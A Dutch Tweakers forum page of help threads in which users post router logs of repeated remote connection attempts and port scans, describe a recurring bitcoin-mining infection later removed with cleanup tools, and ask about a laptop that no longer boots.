[LAN access from remote] from 46.54.143.4:1050 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:51:52
[LAN access from remote] from 126.117.88.152:36345 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:51:42
[LAN access from remote] from 82.72.179.15:45080 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:51:32
[LAN access from remote] from 88.111.48.149:19262 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:51:30
[LAN access from remote] from 109.185.45.86:46058 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:51:30
[LAN access from remote] from 46.47.35.31:10528 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:51:26
[LAN access from remote] from 27.0.23.73:42258 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:51:24
[LAN access from remote] from 24.124.68.24:35977 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:51:20
[LAN access from remote] from 81.233.24.64:43666 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:51:06
[LAN access from remote] from 93.148.235.50:24624 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:51:02
[LAN access from remote] from 76.187.145.221:42193 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:50:40
[LAN access from remote] from 80.202.21.132:49288 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:50:30
[LAN access from remote] from 89.76.0.243:23460 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:50:28
[LAN access from remote] from 62.183.85.196:42586 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:50:21
[LAN access from remote] from 209.128.39.10:2025 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:50:16
[LAN access from remote] from 83.191.76.135:41756 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:50:16
[LAN access from remote] from 83.28.36.205:35542 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:50:15
[LAN access from remote] from 91.142.169.114:23591 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:50:13
[LAN access from remote] from 46.12.89.135:10661 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:50:12
[LAN access from remote] from 46.161.84.178:44613 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:50:11
[LAN access from remote] from 109.161.77.189:6881 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:50:08
[LAN access from remote] from 94.41.30.227:53786 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:50:08
[LAN access from remote] from 79.180.155.63:26587 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:50:03
[LAN access from remote] from 109.222.30.224:33404 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:50:00
[LAN access from remote] from 46.46.53.180:19294 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:56
[LAN access from remote] from 46.246.92.44:34380 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:47
[LAN access from remote] from 80.185.181.237:17788 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:46
[Admin login failure] from source 192.168.1.4, Tuesday, Aug 14,2012 11:49:43
[LAN access from remote] from 119.193.104.22:1245 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:40
[LAN access from remote] from 46.232.228.172:31336 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:37
[LAN access from remote] from 81.207.167.73:10473 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:36
[LAN access from remote] from 206.75.97.116:61168 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:34
[LAN access from remote] from 89.122.243.97:16095 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:23
[LAN access from remote] from 188.97.231.185:32968 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:22
[LAN access from remote] from 74.115.1.94:19918 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:22
[LAN access from remote] from 183.179.123.110:22505 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:22
[LAN access from remote] from 24.98.144.242:29078 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:21
[LAN access from remote] from 91.205.238.32:10949 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:21
[LAN access from remote] from 109.242.67.176:37869 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:21
[LAN access from remote] from 95.25.243.82:64569 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:20
[LAN access from remote] from 46.107.67.123:2607 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:20
[LAN access from remote] from 174.5.133.144:52238 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:18
[LAN access from remote] from 2.35.151.180:1049 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:15
[LAN access from remote] from 46.254.97.167:63937 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:09
[LAN access from remote] from 49.244.167.46:11027 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:08
[LAN access from remote] from 87.202.179.45:28743 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:04
[LAN access from remote] from 80.174.146.172:36627 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:49:03
[LAN access from remote] from 80.202.51.2:36034 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:53
[LAN access from remote] from 69.204.115.84:27954 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:53
[LAN access from remote] from 176.52.43.144:24303 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:52
[LAN access from remote] from 209.240.33.6:52141 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:52
[LAN access from remote] from 178.122.159.24:14796 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:51
[LAN access from remote] from 178.128.173.145:59957 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:50
[LAN access from remote] from 2.98.157.248:11418 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:47
[LAN access from remote] from 213.112.14.152:56822 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:47
[LAN access from remote] from 91.182.204.107:2578 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:46
[LAN access from remote] from 84.208.255.231:28473 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:39
[LAN access from remote] from 77.85.132.235:44629 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:38
[LAN access from remote] from 188.50.218.243:64219 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:33
[LAN access from remote] from 27.110.233.67:33060 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:33
[LAN access from remote] from 2.95.108.205:22186 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:30
[LAN access from remote] from 78.165.108.65:28723 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:29
[LAN access from remote] from 2.49.234.107:33863 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:26
[LAN access from remote] from 84.49.143.27:37449 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:25
[LAN access from remote] from 176.251.82.4:52363 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:25
[LAN access from remote] from 79.140.12.6:24795 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:22
[LAN access from remote] from 221.24.110.159:47963 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:14
[LAN access from remote] from 95.105.110.30:6881 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:13
[LAN access from remote] from 109.101.60.245:1094 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:08
[LAN access from remote] from 62.253.144.140:18905 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:04
[LAN access from remote] from 218.112.132.53:32249 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:03
[LAN access from remote] from 190.213.161.163:49200 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:03
[LAN access from remote] from 101.99.11.24:63381 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:00
[LAN access from remote] from 46.72.70.238:59381 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:48:00
[LAN access from remote] from 178.95.128.249:25590 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:55
[LAN access from remote] from 115.208.173.39:11935 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:55
[LAN access from remote] from 182.68.46.54:37981 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:53
[LAN access from remote] from 124.185.191.41:32027 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:52
[LAN access from remote] from 213.89.108.7:48622 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:49
[LAN access from remote] from 84.41.95.98:60608 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:47
[LAN access from remote] from 78.26.128.183:34039 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:46
[LAN access from remote] from 41.133.91.85:80 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:46
[LAN access from remote] from 141.170.224.246:22973 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:44
[LAN access from remote] from 180.254.155.42:10056 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:44
[LAN access from remote] from 212.226.41.187:37441 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:42
[LAN access from remote] from 202.133.60.106:38697 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:41
[LAN access from remote] from 202.69.164.50:5299 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:40
[LAN access from remote] from 210.187.171.20:12148 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:38
[LAN access from remote] from 2.233.221.180:12177 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:36
[Admin login] from source 192.168.1.4, Tuesday, Aug 14,2012 11:47:33
[LAN access from remote] from 187.11.53.191:62558 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:33
[LAN access from remote] from 95.26.170.119:30968 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:31
[LAN access from remote] from 80.221.185.84:52915 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:30
[LAN access from remote] from 178.166.13.163:50025 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:29
[Admin login failure] from source 192.168.1.4, Tuesday, Aug 14,2012 11:47:29
[LAN access from remote] from 90.199.96.248:52525 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:29
[LAN access from remote] from 86.104.254.225:38818 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:27
[LAN access from remote] from 89.136.120.174:51329 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:25
[LAN access from remote] from 188.169.166.76:1038 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:22
[LAN access from remote] from 109.58.188.102:43204 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:19
[LAN access from remote] from 92.112.51.143:14300 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:19
[LAN access from remote] from 117.6.8.211:29391 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:18
[LAN access from remote] from 94.40.103.77:29335 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:18
[LAN access from remote] from 31.9.112.205:28074 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:15
[LAN access from remote] from 119.246.86.42:49278 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:13
[LAN access from remote] from 90.191.154.128:63157 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:08
[LAN access from remote] from 72.172.116.234:19430 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:07
[LAN access from remote] from 2.49.70.10:35787 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:07
[LAN access from remote] from 78.69.193.51:60068 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:06
[LAN access from remote] from 83.7.84.21:14384 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:05
[LAN access from remote] from 95.57.43.144:10015 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:47:04
[LAN access from remote] from 118.152.116.177:61850 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:46:59
[LAN access from remote] from 110.46.218.13:38713 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:46:58
[LAN access from remote] from 60.240.137.78:55011 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:46:58
[LAN access from remote] from 91.219.232.233:21314 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:46:57
[LAN access from remote] from 187.21.255.147:28203 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:46:56
[LAN access from remote] from 177.162.38.137:47440 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:46:55
[LAN access from remote] from 78.8.129.93:54187 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:46:51
[LAN access from remote] from 80.23.37.1:57516 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:46:44


Waarschijnlijk een virus dus, toen on middelijk virusscanners laten lopen, vonden een paar virusjes op een vrijwel ongebruikte computer in het netwerk, de rest van de computers bevatte geen noemenswaardig virus. Na dit te hebben uitgevoerd verdwijnen de LAN acces from remote logs maar komt er dit voor in de plaats;
[DoS attack: ACK Scan] attack packets in last 20 sec from ip [217.110.97.194], Tuesday, Aug 14,2012 13:32:59
[DoS attack: RST Scan] attack packets in last 20 sec from ip [217.110.97.194], Tuesday, Aug 14,2012 13:32:53
[LAN access from remote] from 197.0.49.208:35782 to 192.168.1.11:60681 Tuesday, Aug 14,2012 13:29:47
[Admin login] from source 192.168.1.5, Tuesday, Aug 14,2012 13:28:09
[DoS attack: RST Scan] attack packets in last 20 sec from ip [217.110.97.194], Tuesday, Aug 14,2012 13:25:38
[DoS attack: RST Scan] attack packets in last 20 sec from ip [217.110.97.200], Tuesday, Aug 14,2012 14:17:58
[DoS attack: ACK Scan] attack packets in last 20 sec from ip [217.110.97.200], Tuesday, Aug 14,2012 14:17:58
[DoS attack: RST Scan] attack packets in last 20 sec from ip [217.110.97.200], Tuesday, Aug 14,2012 14:17:53
[DoS attack: RST Scan] attack packets in last 20 sec from ip [217.110.97.194], Tuesday, Aug 14,2012 14:10:04
[DoS attack: ACK Scan] attack packets in last 20 sec from ip [217.110.97.194], Tuesday, Aug 14,2012 14:09:59


Juist, een bepaalde computer in het netwerk wordt aangevallen, internetten op deze computer is onmogelijk geworden.
Als ik de logs van de firewall van f-secure bekijk constateer ik dat in 1 minuut wel 44 verschillende verbindingen opgezet proberen te worden met mijn computer dit is een van de vele waarschuwingen die ik van de firewall krijg;
Beschrijving: Inbound TCP connection attempt
Actie: verkeer geblokkeerd door firewall
tijd: 14-8-2012 18:01:45
richting: inkomend
protocol: tcp
services: TCP High ports in
extern adres 217.110.97.194
externe poort: http(80)
lokaal adres: 192.168.1.4
lokale poort 50517
dns-naam de dns-naam kan niet worden gevonden


Wat kan ik nog doen om dit te stoppen ? Ziggo kan niks voor me betekenen, in de router kan ik ook geen ip adressen blokkeren.
Ook heb ik geen flauw idee wie of wat op het interne adres 192,168.1.11 zit, ik heb altijd gekeken naar attaced devices op de router en dit device staat er simpelweg nooit tussen.

Wat ik al gedaan heb;
Op alle computers in het netwerk een volledige scan uitgevoerd, met oa f-secure en hitmanpro.
Op alle computers gescand met Mbam.
Alle virussen die gevonden werden verwijderd.
De firewalls op niveau strikt gezet.

Hardnekkig bitcoin mining virus.

07-08-2012 discussie 16
(Opgelost)

Beste mede tweakers,

Sinds twee dagen heb ik last van een virus dat ik maar niet weg kan krijgen. Het virus maakt een proces aan dat mijn pc gebruikt om bitcoins te minen.

Wat doet het virus (zover ik weet)

Het virus zit waarschijnlijk aan een hostproces van windows gekoppeld. Elke keer als ik mijn computer opstart krijg ik de melding dat er 2 hostprocessen zijn gestopt met werken.
Ik houd op dat moment een zwart beeld.
Als ik in systeembeheer kijk zie ik dat er een proces bezig is die A-1659866002.exe heet. Zodra ik dit proces stop gaat windows verder met opstarten.
Het A-1659866002.exe gaat echter wel weer verder en daarna sluit ik het voor de zekerheid nog maar een keer af.
Er zijn nu een aantal bestanden op mijn computer gezet in mijn User/(gebruikersnaam) map en mijn Appdata/roaming map. Deze bestanden doen zich echter voor als windows bestanden (zichtbaar dankzij mapopties) of zijn compleet onzichtbaar.
Verder is er een scheduled task te vinden van A-1659866002.exe alleen elke keer als ik deze verwijder komt hij bij het opstarten terug. A-1659866002.exe zelf is onvindbaar.
Als je het virus zijn gang laat gaan zal hij een proces opstarten met een random naam bijvoorbeeld sdoij34ofd.exe en deze zal bitcoins gaan minen.

Wat ik heb al geprobeerd?
AVG free geeft soms aan dat er een trojan bestand is te vinden in de Appdata/roaming map. Echter deze komt elke keer terug.
Spybot zegt all clean.
Malwarebytes geeft soms het A-1659866002.exe proces aan en de processen in de Appdata/roaming map. Alleen deze komen elke keer na het opstarten terug.
HiJackThis geeft weinig interessants aan. Alle processen zijn bekend.

Zo als het er nu naar uit ziet is dit alleen maar op te lossen door windows opnieuw te installeren alleen dit wil ik graag voorkomen aangezien ik dan weer een paar dagen bezig ben om alles te krijgen zoals het was.

Dus graag tips of suggesties. Alle hulp is welkom.

(Opgelost)
Dankzij Stinger en Combofix opgelost.

Windows start niet meer... Ook niet in veilige modus.

07-07-2012 discussie 39
Geachte mannen van Tweakers,

Mijn vriendin had laatst last van haar laptop. Windows7 liep enorm traag en als ik je de muis op de werkbalk hield kwam er dat rondje aka zandlopertje.

Ik wist het meteen; dit is een virus, aangezien het na het opstarten van een programma vast liep.

Na diverse keren in veilige modus gewerkt te hebben bleef mijn virusscan, AVG2011, telkens vast lopen op De Sims. Hiervoor bleef deze overigens een kwartier lang staan op hklm/software/microsoft/windows/currentversion/run//apoint maar hierna ging het gewoon verder. Toen de sims bereikt was liep het dus vast.
Computer vervolgens opnieuw opgestart en weer dezelfde scan uitgevoerd, weer ging het traag bij hklm/software/microsoft/windows/currentversion/run//apoint en dit keer was Evernote de boosdoener die deze virusscan liet vastlopen... Wederom de laptop opnieuw opgestart maar dit keer kreeg ik een ander scherm. Ik kon kiezen uit twee opties: Windows normaal starten of windows herstellen (dat menu waar je kan kiezen uit herstelpunt etc.) ik koos voor deze optie.
Ik kreeg de windows achtergrond, maar geen scherm om uit deze opties te kiezen... Toch nog maar even wachten, en na een half uur nog steeds niet. Computer uitgedrukt en weer opnieuw opstarten, wederom deze twee opties. Computer uitgedrukt en F8 ingedrukt houden. Voor de optie veilige modus gekozen en toen gebeurde er iets geks; veilige modus kan niet gestart worden; ik kreeg dit http://i50.tinypic.com/v3qfpu.jpg scherm en na 5 minuten startte mijn laptop opnieuw op.

Vertel me alstublieft wat er aan de hand is.
Het gaat overigens om een SONY Vaio vpceb2e4e.

Als het einde oefening is zou ik graag willen weten hoe ik alsnog een back up kan maken van haar foto's.


Gegroet,

Nick de Waard
Resultaten per pagina: 25 | 50 | 100
1 2 3 4 5


Samsung Galaxy S7 edge Athom Homey Apple iPhone SE Raspberry Pi 3 Apple iPad Pro Wi-Fi (2016) HTC 10 Hitman (2016) LG G5

© 1998 - 2016 de Persgroep Online Services B.V. Tweakers vormt samen met o.a. Autotrack en Carsom.nl de Persgroep Online Services B.V. Hosting door True